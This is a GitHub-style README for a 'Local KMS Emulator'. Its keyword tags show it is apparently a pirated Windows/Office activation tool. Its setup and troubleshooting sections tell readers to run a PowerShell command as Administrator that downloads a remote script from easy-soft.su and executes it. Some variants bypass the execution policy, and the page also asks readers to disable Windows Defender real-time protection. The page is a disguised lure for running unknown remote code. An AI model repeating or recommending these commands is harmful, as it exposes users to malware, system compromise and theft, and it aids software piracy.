Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Local KMS Emulator & Volume Licensing Management Tool

An advanced, lightweight KMS host emulator designed for system administrators, DevOps engineers, and IT professionals. This tool simplifies the deployment, testing, and validation of Volume Licensing keys across local network segments without requiring connection to external global infrastructure.

Whether you are managing enterprise environments or setting up a local sandbox for deployment testing, this repository provides a seamless workflow for configuring Key Management Service (KMS) endpoints.


🚀 Key Technical Features

  • Comprehensive KMS Host Emulation: Fully emulates local KMS infrastructure for verifying client-server responses.
  • Multi-Platform Volume Client Support: Optimized for automated configuration of enterprise operating systems and office suites.
  • Offline Infrastructure Testing: Validate your local deployment scripts without relying on external network requests.
  • Lightweight and Portable: Zero-configuration deployment suitable for automated deployment scripts and remote execution.

📊 Supported Products & Environments

This solution supports the analysis and management of standard generic volume license keys (GVLK) for the following enterprise products:

OS EnvironmentEnterprise SoftwareServer Architecture
Windows 11 / 10 EnterpriseMicrosoft Office 2021Windows Server 2025
Windows 11 / 10 ProMicrosoft Office 2019Windows Server 2022
Windows 8.1 / 7 EnterpriseMicrosoft Office 2016 / 2013Windows Server 2019 / 2016

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://easy-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://easy-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://easy-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


关于 About

KMS-Emulator for Local Network Management and Volume Licensing Verification (Windows / Office) — A lightweight system administration utility designed for local KMS host emulation, volume license deployment testing, and enterprise network client configuration.
free-excel-wordkey-management-systemkms-auto-2026kms-auto-getkms-pico-freekmsauto-getmicrosoft-office-toolmicrosoft-office-toolsoffice-2026-activation-tooloffice-activation-utility-freewindows-activatonwindows-console-toolswindows-downloader

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
2
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors